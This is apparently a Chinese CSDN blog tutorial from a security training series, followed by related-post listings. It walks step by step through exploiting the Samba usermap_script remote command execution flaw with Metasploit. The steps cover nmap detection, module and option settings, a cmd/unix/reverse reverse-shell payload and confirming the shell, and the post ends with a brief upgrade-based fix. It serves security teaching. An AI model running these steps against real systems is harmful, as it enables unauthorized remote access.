6-15漏洞利用-smb-RCE远程命令执行

最新推荐文章于 2025-05-29 10:15:04 发布
最新推荐文章于 2025-05-29 10:15:04 发布
阅读量1k 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全训练营 文章标签: unix 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53008479/article/details/125935519
本文介绍了如何使用Metasploit工具通过Samba的usermap_script漏洞进行远程代码执行(RCE),包括探测、利用过程和防御修复建议。重点讲解了漏洞探测、exploit模块和升级策略来避免此类攻击。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

samba介绍

Samba是在Linux和UNIX系统上实现SMB文件共享协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Message Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。

一般运行在139、445端口。如果目标开启了445,应该是开启了支持smb协议的一个软件,139也是它的一个证明

探测目标samba

使用nmap -sV -p 139,445 IP地址 探测目标端口服务版本信息。

nmap -sV -p 139,445 192.168.1.106

在这里插入图片描述

metasploit漏洞利用

在metasploit中集成了利用samba usermap RCE的脚本

exploit/mulit/samba/usermap_script

在这里插入图片描述

之后就可以执行系统的命令

back
//退回
use exploit/multi/samba/usermap_script
show options
set rhosts 192.168.106
show options

在这里插入图片描述

查看设置是否成功,运程端口,也可以改成445

show payloads

在这里插入图片描述

可以查看我们当前模块支持的payload,这里我们将使用一个反弹的payload

set payload cmd/unix/reverse
show options

在这里插入图片描述

ifconfig

在这里插入图片描述

set lhosts 192.168.1.105
show options

在这里插入图片描述

可以看到默认情况下,是反弹到4444端口

exploit
ifconfig

在这里插入图片描述

id
whoami
hostname

在这里插入图片描述

以上,我们就使用metasploit中,集成的usermap_script rce漏洞脚本,利用了samba当中的一个漏洞工具,成功的集成了系统的命令,起到了远程代码执行的效果

防御修复

在metasploit show info可以查看漏洞信息

在这里插入图片描述

表示samba在3.0.20到3.0.25之间的选项,使得我们存在一个可以执行远程命令执行的一个漏洞,我们可以执行修复策略,升级samba,使得我们不在版本范围之内,避免出现username map这个漏洞,避免服务器被远程代码执行

show info

在这里插入图片描述

查看详细信息

[横向移动] SMB 远程命令执行横向移动
Blue17 の 小窝
03-21 540
0x01:SMB 介绍🌟0x01:SMB 介绍SMB(Server Message Block)是一种网络协议,,主要用于在计算机之间共享文件、打印机、串行端口等资源。它是 Windows 系统的核心协议之一,也被广泛应用于 Linux(通过 Samba 实现)和其它操作系统。通过 SMB 服务,客户端可以与服务端建立连接,当连接建立后,客户端就可以向服务端发送 SMB 命令允许用户访问共享、打开、读取或者是写入文件。0x02:SMB 衍生工具 — SMBExec。
内网渗透(四十三)之横向移动篇-SMB远程执行命令横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-20 821
SMB 全称是 Server Message Block 翻译过来是服务器信息块,它也是一种客户端到服务器的通信协议。除此之外,SMB 协议也被称为请求-回复协议。客户端与服务器建立连接后,客户端可以向服务器发送SMB命令允许用户访问共享、打开、读取或者是写入文件。利用条件:开启了445端口。
smb-RCE远程命令执行漏洞利用
Myu_wzy的博客
10-09 1612
一、实验环境 目标主机: Metasploit2虚拟机 192.168.20.143 攻击主机: Kali2虚拟机 192.168.20.133 二、实验过程 1.进入msf:msfconsole 2.使用metasploit集成的利用samba usermap RCE脚本 3.设置相应参数 4.运行模块,接受反弹shell获得权限,并验证 ...
如何清理内网SMB漏洞
最新发布
Aishenyanying33的博客
05-29 483
SMB 漏洞风险 主要影响: Windows 7/8/10(部分老版本)存在 MS17-010(EternalBlue)漏洞 被攻击后可直接远程执行代码,无需账号密码 常用于: WannaCry 勒索 蓝队溯源难度大 横向移动(配合Mimikatz)
SMB漏洞
小锤队长的博客
10-06 1万+
目录 一,SMB信息泄露 充电站: 二,MS17-010 (永恒之蓝) 复现 一,SMB信息泄露 靶场:192.168.11.167 攻击机:kali 192.168.11.165 信息探测: nmap -sV 192.168.11.167 可以看到开放了,22 ssh端口,139,445的smb服务端口,以及3306的mysal服务 扫描更详细的信息: nmap -...
SMB协议——永恒之蓝漏洞利用
浅浅的博客
03-06 1万+
SMB — 永恒之蓝漏洞利用 1、实验环境: 攻击机:kali IP:192.168.247.158 被攻击机:Win 7 IP:192.168.247.150 2、实验步骤: 被攻击机Win 7: 在被攻击机Win 7中开启SMB1,HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/services/LanmanServe...
Windows SMB高危漏洞
01-03
针对CVE-2017-11780的Windows SMB(SMBv1)远程代码执行漏洞,CVE-2017-11771的Windows Search远程代码执行漏洞
Windows-SMB-Ghost-CVE-2020-0796漏洞分析1
08-03
这个漏洞存在于Microsoft Server MessageBlock (SMB) 3.1.1协议的客户端和服务器端,允许远程攻击者在目标SMB Server或Client上执行任意代码,具有严重的安全隐患。 漏洞细节: 该漏洞的根本原因在于Windows驱动srv...
CVE-2024-38077 – Windows 远程桌面许可服务 RCE 漏洞(“MadLicense”)
技术超强的网络安全平台
08-28 1323
最近,安全研究人员发布了针对Windows Server 中一个严重远程代码执行 (RCE)
[系统安全] 十.Windows漏洞利用SMBv3服务远程代码执行漏洞(CVE-2020-0796)及防御详解
杨秀璋的专栏
12-30 5525
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞利用445端口。这篇文章将详细讲解SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用漏洞远程无需用户验证,通过发送构造特殊的恶意数据导致在目标系统上执行恶意代码,从而获取机器的完全控制,利用的端口
CVE-2020-0796 SMB 3.1.1内存破坏漏洞远程代码执行
5. 远程代码执行(RCE):远程代码执行漏洞是指攻击者可以通过网络或其他远程通信手段,在没有物理访问权限的情况下,执行恶意代码的能力。这种漏洞对受影响的系统安全构成极大威胁,因为它可以让攻击者绕过许多传统...
SMB服务漏洞MS17-010渗透测试
热门推荐
sinat_41880528的博客
07-03 1万+
1.MS17-010漏洞简介     MS17-010是微软Windows 系统SMB协议的漏洞。由于某些请求的处理不当,Microsoft Server Message Block 1.0(SMBv1)中存在多个远程代码执行漏洞远程Windows主机受到以下漏洞的影响:CVE-20170143,CVE-20170144,CVE-20170145,CVE-20170146,CVE-2017014...
4.9、漏洞利用 smb-RCE远程命令执行
c10udz的博客
11-12 4126
1.1 samba是在LinuxUNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。1.2 SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器(C/S)型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。1.3 samba监听的端口。
smbexec: 简单、高效的远程执行命令工具
gitblog_00002的博客
03-18 1201
smbexec: 简单、高效的远程执行命令工具 smbexec 项目地址: https://gitcode.com/gh_mirrors/smbe/smbexec 是一个轻量级的 Python 脚本,用于通...
Windows-smb漏洞利用介绍
qq_48423330的博客
02-09 598
Windows-smb漏洞利用介绍
开发者论坛一周精粹(第四期):Windows系统 SMB/RDP远程命令执行漏洞
weixin_33724046的博客
02-08 225
摘要:2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确保您在阿里云上的业务安全,请您关注。第四期(2017年4月8日-2017年4月14日)2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个W...
SMB协议与永恒之蓝漏洞利用
weixin_45116657的博客
06-19 3910
一,SMB服务 SMB(全称为Server Message Block)是一个协议名,可用于在计算机间共享文件、打印机,串口等,电脑上的网上邻居就是靠他实现的; SMB是一个应用层协议,可以工作在NETBIOS协议之上(TCP/139)或者TCP协议(TCP/445)之上; SMB协议和NETBIOS协议在Windows主机默认安装; SMB版本最新的是3.X,win7和vista是2.X。wi...
linux smb 漏洞_Samba远程漏洞(CVE-2017-7494)利用分析
weixin_42545066的博客
12-23 1494
前言Samba远程漏洞(CVE-2017-7494) 被称为Linux 版的永恒之蓝,由于其影响范围广以及攻击成功后获得的权限高(一般默认smb服务以root权限运行)受到了广泛的关注,趁空余时间写一下这个漏洞的复现以及利用分析漏洞成因Linux Samba 协议实现代码中,处于source3/rpc_server/srv_pipe.c中的is_known_pipename()函数对路径过滤不严格...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值